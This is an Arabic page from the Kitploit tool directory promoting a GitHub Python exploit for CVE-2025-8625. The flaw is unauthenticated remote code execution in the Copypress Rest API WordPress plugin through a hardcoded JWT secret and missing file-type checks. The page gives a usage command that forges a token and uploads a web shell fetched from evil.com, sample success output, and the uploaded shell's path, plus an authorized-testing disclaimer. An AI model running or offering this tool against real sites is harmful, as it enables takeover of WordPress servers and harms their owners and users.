Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - الافتقار إلى سر JWT قابل للتكوين والتحقق من نوع الملفات يؤدي إلى تنفيذ تعليمات برمجية عن بُعد دون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-8625
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - الافتقار إلى سر JWT قابل للتكوين والتحقق من نوع الملفات يؤدي إلى تنفيذ تعليمات برمجية عن بُعد دون مصادقة

عرض المستودع
2منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8625

إضافة Copypress Rest API 1.1 - 1.2 - غياب سر JWT قابل للتهيئة والتحقق من نوع الملفات يؤدي إلى تنفيذ تعليمات برمجية عن بُعد دون مصادقة

🛡️ أداة استغلال ثغرة RCE في Copypress Rest API 1.1 - 1.2

📝 الوصف

إن إضافة Copypress Rest API لـ WordPress (الإصدارات من 1.1 إلى 1.2) معرضة لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر دالة copyreap_handle_image().
تستخدم الإضافة مفتاح توقيع JWT مثبَّتًا في الكود عندما لا يتم تعيين أي سر، ولا تتحقق من أنواع الملفات، مما يسمح للمهاجمين غير المصادَق عليهم بتزوير الرموز ورفع ملفات تعسفية (مثل قشرة PHP) عبر نقطة نهاية معالج الصور.

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (حرجة)

🚀 نظرة عامة على السكربت

اسم السكربت: CVE-2025-8625.py
يقوم هذا السكربت المكتوب بلغة Python بأتمتة استغلال الثغرة، مما يتيح لك توليد JWT صالح، وإرسال طلب مُصمَّم، ورفع ملف ضار (قشرة ويب) إلى موقع WordPress المستهدف.


⚙️ طريقة الاستخدام

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url: رابط موقع WordPress المستهدف
  • -shell / --shell: رابط مباشر لقشرة الويب أو ملف PHP ضار

مثال على الإخراج:

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 الميزات

  • توليد JWT صالح باستخدام السر الثابت للإضافة
  • تجاوز المصادقة لرفع ملفات تعسفية
  • يقدم إخراجًا واضحًا لنجاح أو فشل الاستغلال
  • واجهة سطر أوامر بسيطة

📂 موقع رفع القشرة

تم رفع القشرة بنجاح! 🎉
مثال على مسار القشرة:

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض تعليمية ولاختبار الاختراق المصرح به فقط.
استخدامها ضد أهداف دون إذن صريح يعد غير قانوني.


بواسطة: Nxploited (Khaled Alenazi)

تنزيل الأداة